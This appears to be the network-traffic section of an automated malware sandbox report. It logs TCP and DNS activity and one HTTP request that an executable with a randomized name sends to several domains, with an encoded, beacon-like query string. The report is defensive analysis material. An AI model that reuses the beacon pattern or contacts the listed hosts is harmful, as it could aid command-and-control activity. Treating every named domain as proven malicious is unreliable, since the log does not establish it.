Jul 26, 2024 09:41:34.500504971 CEST	80	49721	38.181.21.136	192.168.2.5
Jul 26, 2024 09:41:34.500572920 CEST	80	49721	38.181.21.136	192.168.2.5
Jul 26, 2024 09:41:34.500675917 CEST	49721	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:35.124197960 CEST	49721	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:36.159280062 CEST	49722	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:36.197171926 CEST	80	49722	38.181.21.136	192.168.2.5
Jul 26, 2024 09:41:36.197432995 CEST	49722	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:36.223187923 CEST	49722	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:36.229024887 CEST	80	49722	38.181.21.136	192.168.2.5
Jul 26, 2024 09:41:36.230649948 CEST	80	49722	38.181.21.136	192.168.2.5
Jul 26, 2024 09:41:37.119168997 CEST	80	49722	38.181.21.136	192.168.2.5
Jul 26, 2024 09:41:37.119259119 CEST	80	49722	38.181.21.136	192.168.2.5
Jul 26, 2024 09:41:37.119440079 CEST	49722	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:37.733275890 CEST	49722	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:38.809535980 CEST	49723	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:38.814735889 CEST	80	49723	38.181.21.136	192.168.2.5
Jul 26, 2024 09:41:38.814836025 CEST	49723	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:38.839445114 CEST	49723	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:38.852900982 CEST	80	49723	38.181.21.136	192.168.2.5
Jul 26, 2024 09:41:39.781392097 CEST	80	49723	38.181.21.136	192.168.2.5
Jul 26, 2024 09:41:39.781446934 CEST	80	49723	38.181.21.136	192.168.2.5
Jul 26, 2024 09:41:39.781582117 CEST	49723	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:39.793313980 CEST	49723	80	192.168.2.5	38.181.21.136
Jul 26, 2024 09:41:39.798428059 CEST	80	49723	38.181.21.136	192.168.2.5
Jul 26, 2024 09:41:45.294656038 CEST	49724	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:45.302239895 CEST	80	49724	47.238.77.168	192.168.2.5
Jul 26, 2024 09:41:45.302452087 CEST	49724	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:45.325150013 CEST	49724	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:45.333466053 CEST	80	49724	47.238.77.168	192.168.2.5
Jul 26, 2024 09:41:46.214287043 CEST	80	49724	47.238.77.168	192.168.2.5
Jul 26, 2024 09:41:46.214451075 CEST	80	49724	47.238.77.168	192.168.2.5
Jul 26, 2024 09:41:46.214585066 CEST	49724	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:46.843624115 CEST	49724	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:47.887655973 CEST	49725	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:47.893659115 CEST	80	49725	47.238.77.168	192.168.2.5
Jul 26, 2024 09:41:47.893810987 CEST	49725	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:47.924129963 CEST	49725	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:47.932555914 CEST	80	49725	47.238.77.168	192.168.2.5
Jul 26, 2024 09:41:48.859035015 CEST	80	49725	47.238.77.168	192.168.2.5
Jul 26, 2024 09:41:48.859206915 CEST	80	49725	47.238.77.168	192.168.2.5
Jul 26, 2024 09:41:48.859262943 CEST	49725	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:49.437133074 CEST	49725	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:50.486200094 CEST	49726	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:50.491520882 CEST	80	49726	47.238.77.168	192.168.2.5
Jul 26, 2024 09:41:50.492875099 CEST	49726	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:50.523245096 CEST	49726	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:50.529546976 CEST	80	49726	47.238.77.168	192.168.2.5
Jul 26, 2024 09:41:50.529589891 CEST	80	49726	47.238.77.168	192.168.2.5
Jul 26, 2024 09:41:51.714416027 CEST	80	49726	47.238.77.168	192.168.2.5
Jul 26, 2024 09:41:51.714478016 CEST	80	49726	47.238.77.168	192.168.2.5
Jul 26, 2024 09:41:51.714915991 CEST	49726	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:52.031595945 CEST	49726	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:53.072738886 CEST	49727	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:53.189754963 CEST	80	49727	47.238.77.168	192.168.2.5
Jul 26, 2024 09:41:53.195652962 CEST	49727	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:53.216720104 CEST	49727	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:53.223185062 CEST	80	49727	47.238.77.168	192.168.2.5
Jul 26, 2024 09:41:54.129388094 CEST	80	49727	47.238.77.168	192.168.2.5
Jul 26, 2024 09:41:54.129673004 CEST	80	49727	47.238.77.168	192.168.2.5
Jul 26, 2024 09:41:54.129707098 CEST	80	49727	47.238.77.168	192.168.2.5
Jul 26, 2024 09:41:54.129827023 CEST	49727	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:54.129827976 CEST	49727	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:54.141402960 CEST	49727	80	192.168.2.5	47.238.77.168
Jul 26, 2024 09:41:54.163614988 CEST	80	49727	47.238.77.168	192.168.2.5
Jul 26, 2024 09:41:59.224729061 CEST	49728	80	192.168.2.5	3.33.130.190
Jul 26, 2024 09:41:59.229682922 CEST	80	49728	3.33.130.190	192.168.2.5
Jul 26, 2024 09:41:59.229827881 CEST	49728	80	192.168.2.5	3.33.130.190
Jul 26, 2024 09:41:59.249332905 CEST	49728	80	192.168.2.5	3.33.130.190
Jul 26, 2024 09:41:59.254772902 CEST	80	49728	3.33.130.190	192.168.2.5
Jul 26, 2024 09:41:59.706518888 CEST	80	49728	3.33.130.190	192.168.2.5
Jul 26, 2024 09:41:59.707142115 CEST	49728	80	192.168.2.5	3.33.130.190
Jul 26, 2024 09:42:00.774833918 CEST	49728	80	192.168.2.5	3.33.130.190
Jul 26, 2024 09:42:00.779915094 CEST	80	49728	3.33.130.190	192.168.2.5
Jul 26, 2024 09:42:01.831475973 CEST	49729	80	192.168.2.5	3.33.130.190
Jul 26, 2024 09:42:01.836596966 CEST	80	49729	3.33.130.190	192.168.2.5
Jul 26, 2024 09:42:01.839031935 CEST	49729	80	192.168.2.5	3.33.130.190
Jul 26, 2024 09:42:01.870256901 CEST	49729	80	192.168.2.5	3.33.130.190
Jul 26, 2024 09:42:01.875435114 CEST	80	49729	3.33.130.190	192.168.2.5
Jul 26, 2024 09:42:02.343014002 CEST	80	49729	3.33.130.190	192.168.2.5
Jul 26, 2024 09:42:02.343101978 CEST	49729	80	192.168.2.5	3.33.130.190
Jul 26, 2024 09:42:03.375332117 CEST	49729	80	192.168.2.5	3.33.130.190
Jul 26, 2024 09:42:03.380791903 CEST	80	49729	3.33.130.190	192.168.2.5
Jul 26, 2024 09:42:04.426467896 CEST	49730	80	192.168.2.5	3.33.130.190
Jul 26, 2024 09:42:04.432858944 CEST	80	49730	3.33.130.190	192.168.2.5
Jul 26, 2024 09:42:04.432957888 CEST	49730	80	192.168.2.5	3.33.130.190
Jul 26, 2024 09:42:04.459798098 CEST	49730	80	192.168.2.5	3.33.130.190
Jul 26, 2024 09:42:04.465267897 CEST	80	49730	3.33.130.190	192.168.2.5
Jul 26, 2024 09:42:04.465428114 CEST	80	49730	3.33.130.190	192.168.2.5
Jul 26, 2024 09:42:04.916141033 CEST	80	49730	3.33.130.190	192.168.2.5
Jul 26, 2024 09:42:04.916477919 CEST	49730	80	192.168.2.5	3.33.130.190
Jul 26, 2024 09:42:05.975893021 CEST	49730	80	192.168.2.5	3.33.130.190
Jul 26, 2024 09:42:05.982186079 CEST	80	49730	3.33.130.190	192.168.2.5
Jul 26, 2024 09:42:07.006778002 CEST	49731	80	192.168.2.5	3.33.130.190
Jul 26, 2024 09:42:07.012058020 CEST	80	49731	3.33.130.190	192.168.2.5
Jul 26, 2024 09:42:07.014858007 CEST	49731	80	192.168.2.5	3.33.130.190
Jul 26, 2024 09:42:07.035057068 CEST	49731	80	192.168.2.5	3.33.130.190
Jul 26, 2024 09:42:07.040157080 CEST	80	49731	3.33.130.190	192.168.2.5
Jul 26, 2024 09:42:07.484842062 CEST	80	49731	3.33.130.190	192.168.2.5
Jul 26, 2024 09:42:07.486210108 CEST	80	49731	3.33.130.190	192.168.2.5
Jul 26, 2024 09:42:07.486321926 CEST	49731	80	192.168.2.5	3.33.130.190
Jul 26, 2024 09:42:07.495198011 CEST	49731	80	192.168.2.5	3.33.130.190
Jul 26, 2024 09:42:07.500786066 CEST	80	49731	3.33.130.190	192.168.2.5
Jul 26, 2024 09:42:12.756052017 CEST	49732	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:12.761173010 CEST	80	49732	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:12.761271954 CEST	49732	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:12.800295115 CEST	49732	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:12.805356979 CEST	80	49732	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:13.232214928 CEST	80	49732	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:13.232474089 CEST	80	49732	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:13.232637882 CEST	49732	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:13.233263969 CEST	80	49732	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:13.233494997 CEST	49732	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:14.312868118 CEST	49732	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:15.350816965 CEST	49733	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:15.356023073 CEST	80	49733	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:15.356128931 CEST	49733	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:15.383358955 CEST	49733	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:15.388422012 CEST	80	49733	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:15.871201038 CEST	80	49733	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:15.872107029 CEST	80	49733	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:15.872143984 CEST	80	49733	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:15.875031948 CEST	49733	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:16.894068003 CEST	49733	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:17.940221071 CEST	49734	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:17.945708990 CEST	80	49734	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:17.945874929 CEST	49734	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:17.977370977 CEST	49734	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:17.983967066 CEST	80	49734	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:17.984009027 CEST	80	49734	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:18.437603951 CEST	80	49734	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:18.437772036 CEST	80	49734	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:18.437846899 CEST	49734	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:18.438150883 CEST	80	49734	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:18.438224077 CEST	49734	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:19.483227968 CEST	49734	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:20.533380032 CEST	49735	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:20.540994883 CEST	80	49735	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:20.541079998 CEST	49735	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:20.570672989 CEST	49735	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:20.576029062 CEST	80	49735	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:21.016109943 CEST	80	49735	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:21.016469002 CEST	80	49735	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:21.016731024 CEST	49735	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:21.018973112 CEST	80	49735	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:21.019120932 CEST	49735	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:21.031115055 CEST	49735	80	192.168.2.5	199.59.243.226
Jul 26, 2024 09:42:21.036184072 CEST	80	49735	199.59.243.226	192.168.2.5
Jul 26, 2024 09:42:26.699074984 CEST	49736	80	192.168.2.5	65.181.134.177
Jul 26, 2024 09:42:26.704241037 CEST	80	49736	65.181.134.177	192.168.2.5
Jul 26, 2024 09:42:26.704332113 CEST	49736	80	192.168.2.5	65.181.134.177
Jul 26, 2024 09:42:26.734072924 CEST	49736	80	192.168.2.5	65.181.134.177
Jul 26, 2024 09:42:26.739890099 CEST	80	49736	65.181.134.177	192.168.2.5
Jul 26, 2024 09:42:28.250243902 CEST	49736	80	192.168.2.5	65.181.134.177
Jul 26, 2024 09:42:28.301879883 CEST	80	49736	65.181.134.177	192.168.2.5
Jul 26, 2024 09:42:29.285634995 CEST	49737	80	192.168.2.5	65.181.134.177
Jul 26, 2024 09:42:29.291121960 CEST	80	49737	65.181.134.177	192.168.2.5
Jul 26, 2024 09:42:29.294893026 CEST	49737	80	192.168.2.5	65.181.134.177
Jul 26, 2024 09:42:29.323256969 CEST	49737	80	192.168.2.5	65.181.134.177
Jul 26, 2024 09:42:29.328551054 CEST	80	49737	65.181.134.177	192.168.2.5
Jul 26, 2024 09:42:30.827538013 CEST	49737	80	192.168.2.5	65.181.134.177
Jul 26, 2024 09:42:30.833322048 CEST	80	49737	65.181.134.177	192.168.2.5
Jul 26, 2024 09:42:30.833406925 CEST	49737	80	192.168.2.5	65.181.134.177
Jul 26, 2024 09:42:31.862580061 CEST	49738	80	192.168.2.5	65.181.134.177
Jul 26, 2024 09:42:31.867742062 CEST	80	49738	65.181.134.177	192.168.2.5
Jul 26, 2024 09:42:31.868025064 CEST	49738	80	192.168.2.5	65.181.134.177
Jul 26, 2024 09:42:31.889897108 CEST	49738	80	192.168.2.5	65.181.134.177
Jul 26, 2024 09:42:31.895565033 CEST	80	49738	65.181.134.177	192.168.2.5
Jul 26, 2024 09:42:31.895596981 CEST	80	49738	65.181.134.177	192.168.2.5
Jul 26, 2024 09:42:33.405424118 CEST	49738	80	192.168.2.5	65.181.134.177
Jul 26, 2024 09:42:33.411266088 CEST	80	49738	65.181.134.177	192.168.2.5
Jul 26, 2024 09:42:33.412962914 CEST	49738	80	192.168.2.5	65.181.134.177
Jul 26, 2024 09:42:34.441499949 CEST	49739	80	192.168.2.5	65.181.134.177
Jul 26, 2024 09:42:34.446676016 CEST	80	49739	65.181.134.177	192.168.2.5
Jul 26, 2024 09:42:34.446775913 CEST	49739	80	192.168.2.5	65.181.134.177
Jul 26, 2024 09:42:34.466281891 CEST	49739	80	192.168.2.5	65.181.134.177
Jul 26, 2024 09:42:34.471779108 CEST	80	49739	65.181.134.177	192.168.2.5
Jul 26, 2024 09:42:43.250268936 CEST	80	49739	65.181.134.177	192.168.2.5
Jul 26, 2024 09:42:43.250566959 CEST	80	49739	65.181.134.177	192.168.2.5
Jul 26, 2024 09:42:43.250744104 CEST	49739	80	192.168.2.5	65.181.134.177
Jul 26, 2024 09:42:43.259987116 CEST	49739	80	192.168.2.5	65.181.134.177
Jul 26, 2024 09:42:43.265043020 CEST	80	49739	65.181.134.177	192.168.2.5
Jul 26, 2024 09:42:48.089183092 CEST	80	49736	65.181.134.177	192.168.2.5
Jul 26, 2024 09:42:48.089266062 CEST	49736	80	192.168.2.5	65.181.134.177
Jul 26, 2024 09:42:48.632339001 CEST	49740	80	192.168.2.5	3.33.244.179
Jul 26, 2024 09:42:48.637455940 CEST	80	49740	3.33.244.179	192.168.2.5
Jul 26, 2024 09:42:48.637541056 CEST	49740	80	192.168.2.5	3.33.244.179
Jul 26, 2024 09:42:48.668580055 CEST	49740	80	192.168.2.5	3.33.244.179
Jul 26, 2024 09:42:48.673731089 CEST	80	49740	3.33.244.179	192.168.2.5
Jul 26, 2024 09:42:49.172492027 CEST	80	49740	3.33.244.179	192.168.2.5
Jul 26, 2024 09:42:49.175599098 CEST	49740	80	192.168.2.5	3.33.244.179
Jul 26, 2024 09:42:50.190789938 CEST	49740	80	192.168.2.5	3.33.244.179
Jul 26, 2024 09:42:50.196247101 CEST	80	49740	3.33.244.179	192.168.2.5
Jul 26, 2024 09:42:51.229883909 CEST	49741	80	192.168.2.5	3.33.244.179
Jul 26, 2024 09:42:51.239892006 CEST	80	49741	3.33.244.179	192.168.2.5
Jul 26, 2024 09:42:51.243067980 CEST	49741	80	192.168.2.5	3.33.244.179
Jul 26, 2024 09:42:51.270817995 CEST	49741	80	192.168.2.5	3.33.244.179
Jul 26, 2024 09:42:51.276289940 CEST	80	49741	3.33.244.179	192.168.2.5
Jul 26, 2024 09:42:51.727452040 CEST	80	49741	3.33.244.179	192.168.2.5
Jul 26, 2024 09:42:51.732764959 CEST	49741	80	192.168.2.5	3.33.244.179
Jul 26, 2024 09:42:52.781203032 CEST	49741	80	192.168.2.5	3.33.244.179
Jul 26, 2024 09:42:52.786159039 CEST	80	49741	3.33.244.179	192.168.2.5
Jul 26, 2024 09:42:53.820766926 CEST	49742	80	192.168.2.5	3.33.244.179
Jul 26, 2024 09:42:53.826015949 CEST	80	49742	3.33.244.179	192.168.2.5
Jul 26, 2024 09:42:53.828917027 CEST	49742	80	192.168.2.5	3.33.244.179
Jul 26, 2024 09:42:53.856777906 CEST	49742	80	192.168.2.5	3.33.244.179
Jul 26, 2024 09:42:53.878938913 CEST	80	49742	3.33.244.179	192.168.2.5
Jul 26, 2024 09:42:53.878952980 CEST	80	49742	3.33.244.179	192.168.2.5
Jul 26, 2024 09:42:54.328222036 CEST	80	49742	3.33.244.179	192.168.2.5
Jul 26, 2024 09:42:54.328463078 CEST	49742	80	192.168.2.5	3.33.244.179
Jul 26, 2024 09:42:55.359354019 CEST	49742	80	192.168.2.5	3.33.244.179
Jul 26, 2024 09:42:55.364526987 CEST	80	49742	3.33.244.179	192.168.2.5
Jul 26, 2024 09:42:56.757235050 CEST	49743	80	192.168.2.5	3.33.244.179
Jul 26, 2024 09:42:56.762706995 CEST	80	49743	3.33.244.179	192.168.2.5
Jul 26, 2024 09:42:56.762798071 CEST	49743	80	192.168.2.5	3.33.244.179
Jul 26, 2024 09:42:56.782439947 CEST	49743	80	192.168.2.5	3.33.244.179
Jul 26, 2024 09:42:56.787364006 CEST	80	49743	3.33.244.179	192.168.2.5
Jul 26, 2024 09:42:57.260608912 CEST	80	49743	3.33.244.179	192.168.2.5
Jul 26, 2024 09:42:57.260709047 CEST	80	49743	3.33.244.179	192.168.2.5
Jul 26, 2024 09:42:57.260941029 CEST	49743	80	192.168.2.5	3.33.244.179
Jul 26, 2024 09:42:57.270909071 CEST	49743	80	192.168.2.5	3.33.244.179
Jul 26, 2024 09:42:57.275854111 CEST	80	49743	3.33.244.179	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 09:40:56.365384102 CEST	52073	53	192.168.2.5	1.1.1.1
Jul 26, 2024 09:40:56.386295080 CEST	53	52073	1.1.1.1	192.168.2.5
Jul 26, 2024 09:41:17.204005003 CEST	56292	53	192.168.2.5	1.1.1.1
Jul 26, 2024 09:41:17.263772011 CEST	53	56292	1.1.1.1	192.168.2.5
Jul 26, 2024 09:41:30.881833076 CEST	55171	53	192.168.2.5	1.1.1.1
Jul 26, 2024 09:41:30.988810062 CEST	53	55171	1.1.1.1	192.168.2.5
Jul 26, 2024 09:41:44.823755980 CEST	64210	53	192.168.2.5	1.1.1.1
Jul 26, 2024 09:41:45.277241945 CEST	53	64210	1.1.1.1	192.168.2.5
Jul 26, 2024 09:41:59.181124926 CEST	61373	53	192.168.2.5	1.1.1.1
Jul 26, 2024 09:41:59.215528011 CEST	53	61373	1.1.1.1	192.168.2.5
Jul 26, 2024 09:42:12.552716970 CEST	53795	53	192.168.2.5	1.1.1.1
Jul 26, 2024 09:42:12.740287066 CEST	53	53795	1.1.1.1	192.168.2.5
Jul 26, 2024 09:42:26.073088884 CEST	55756	53	192.168.2.5	1.1.1.1
Jul 26, 2024 09:42:26.687892914 CEST	53	55756	1.1.1.1	192.168.2.5
Jul 26, 2024 09:42:48.300271988 CEST	65273	53	192.168.2.5	1.1.1.1
Jul 26, 2024 09:42:48.618766069 CEST	53	65273	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 26, 2024 09:40:56.365384102 CEST	192.168.2.5	1.1.1.1	0x446e	Standard query (0)	www.worldheadline.xyz	A (IP address)	IN (0x0001)	false
Jul 26, 2024 09:41:17.204005003 CEST	192.168.2.5	1.1.1.1	0x73d5	Standard query (0)	www.michaelstutorgroup.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 09:41:30.881833076 CEST	192.168.2.5	1.1.1.1	0xfa19	Standard query (0)	www.yp78w.top	A (IP address)	IN (0x0001)	false
Jul 26, 2024 09:41:44.823755980 CEST	192.168.2.5	1.1.1.1	0xd819	Standard query (0)	www.gzlxdj1921.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 09:41:59.181124926 CEST	192.168.2.5	1.1.1.1	0xe83e	Standard query (0)	www.kawambwa-sugar.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 09:42:12.552716970 CEST	192.168.2.5	1.1.1.1	0xece2	Standard query (0)	www.counseloratlaw1806.xyz	A (IP address)	IN (0x0001)	false
Jul 26, 2024 09:42:26.073088884 CEST	192.168.2.5	1.1.1.1	0x4e13	Standard query (0)	www.by8991.vip	A (IP address)	IN (0x0001)	false
Jul 26, 2024 09:42:48.300271988 CEST	192.168.2.5	1.1.1.1	0x11e	Standard query (0)	www.corbincodes.tech	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 26, 2024 09:40:56.386295080 CEST	1.1.1.1	192.168.2.5	0x446e	No error (0)	www.worldheadline.xyz	worldheadline.xyz		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 09:40:56.386295080 CEST	1.1.1.1	192.168.2.5	0x446e	No error (0)	worldheadline.xyz		192.236.177.190	A (IP address)	IN (0x0001)	false
Jul 26, 2024 09:41:17.263772011 CEST	1.1.1.1	192.168.2.5	0x73d5	No error (0)	www.michaelstutorgroup.com	www.michaelstutorgroup.com.cdn.hstgr.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 09:41:17.263772011 CEST	1.1.1.1	192.168.2.5	0x73d5	No error (0)	www.michaelstutorgroup.com.cdn.hstgr.net		84.32.84.65	A (IP address)	IN (0x0001)	false
Jul 26, 2024 09:41:30.988810062 CEST	1.1.1.1	192.168.2.5	0xfa19	No error (0)	www.yp78w.top	yp78w.top		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 09:41:30.988810062 CEST	1.1.1.1	192.168.2.5	0xfa19	No error (0)	yp78w.top		38.181.21.136	A (IP address)	IN (0x0001)	false
Jul 26, 2024 09:41:45.277241945 CEST	1.1.1.1	192.168.2.5	0xd819	No error (0)	www.gzlxdj1921.com		47.238.77.168	A (IP address)	IN (0x0001)	false
Jul 26, 2024 09:41:59.215528011 CEST	1.1.1.1	192.168.2.5	0xe83e	No error (0)	www.kawambwa-sugar.com	kawambwa-sugar.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 09:41:59.215528011 CEST	1.1.1.1	192.168.2.5	0xe83e	No error (0)	kawambwa-sugar.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Jul 26, 2024 09:41:59.215528011 CEST	1.1.1.1	192.168.2.5	0xe83e	No error (0)	kawambwa-sugar.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Jul 26, 2024 09:42:12.740287066 CEST	1.1.1.1	192.168.2.5	0xece2	No error (0)	www.counseloratlaw1806.xyz		199.59.243.226	A (IP address)	IN (0x0001)	false
Jul 26, 2024 09:42:26.687892914 CEST	1.1.1.1	192.168.2.5	0x4e13	No error (0)	www.by8991.vip	86f894fb.by8991.vip.cname.scname.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 09:42:26.687892914 CEST	1.1.1.1	192.168.2.5	0x4e13	No error (0)	86f894fb.by8991.vip.cname.scname.com		65.181.134.177	A (IP address)	IN (0x0001)	false
Jul 26, 2024 09:42:26.687892914 CEST	1.1.1.1	192.168.2.5	0x4e13	No error (0)	86f894fb.by8991.vip.cname.scname.com		38.47.158.122	A (IP address)	IN (0x0001)	false
Jul 26, 2024 09:42:26.687892914 CEST	1.1.1.1	192.168.2.5	0x4e13	No error (0)	86f894fb.by8991.vip.cname.scname.com		213.176.98.207	A (IP address)	IN (0x0001)	false
Jul 26, 2024 09:42:48.618766069 CEST	1.1.1.1	192.168.2.5	0x11e	No error (0)	www.corbincodes.tech		3.33.244.179	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.worldheadline.xyz

www.michaelstutorgroup.com

www.yp78w.top

www.gzlxdj1921.com

www.kawambwa-sugar.com

www.counseloratlaw1806.xyz

www.by8991.vip

www.corbincodes.tech

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49713	192.236.177.190	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:40:56.430809021 CEST	513	OUT	GET /t7vt/?JNx8tTw=uDGK8VjmNJjS9S78Zu3fjPk+qbPTeN8FCtxt9GSvaaiUOHuM2RHrw8XoT9PDXAl+CqF8gx2YQ/m+f5qIVb5xWNdhTtWiVvoVTDqmbClT5EaAJa6SCw+I3UYWCEeU2WlC1g==&F0a=DDvTXr_Hk HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.worldheadline.xyz Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Jul 26, 2024 09:40:57.089904070 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 07:40:56 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 62 38 38 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 77 77 20 2d 20 54 6f 64 61 79 27 73 20 57 77 77 20 42 75 6c 6c 65 74 69 6e 3a 20 4c 61 74 65 73 74 20 53 74 6f 72 69 65 73 20 61 6e 64 20 4b 65 79 20 49 6e 73 69 67 68 74 73 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 74 61 79 20 69 6e 66 6f 72 6d 65 64 20 77 69 74 68 20 74 6f 64 61 79 27 73 20 62 75 6c 6c 65 74 69 6e 20 66 65 61 74 75 72 69 6e 67 20 74 68 65 20 6c 61 74 65 73 74 20 73 74 6f 72 69 65 73 20 61 [TRUNCATED] Data Ascii: b88<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Www - Today's Www Bulletin: Latest Stories and Key Insights</title> <meta name="description" content="Stay informed with today's bulletin featuring the latest stories and key insights in Www. Follow comprehensive coverage and expert analysis."> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; } .container { width: 80%; margin: auto; } header, footer { background: #333; color: #fff; text-align: center; padding: 1em 0; } nav { text-align: center; margin-bottom: 1em; } nav a { margin: 0 1em; text-decoration: none; color: #333; padding: 0.5em 1em; background: #f0f0f0; border: 1px solid #ccc; border-radius: 5px; } .grid { display: flex; flex-wrap: wrap; gap: 1em; } .grid-item { flex: 1 1 calc(33.333% - 1em); box-shadow: 0 0 10px rgba(0, 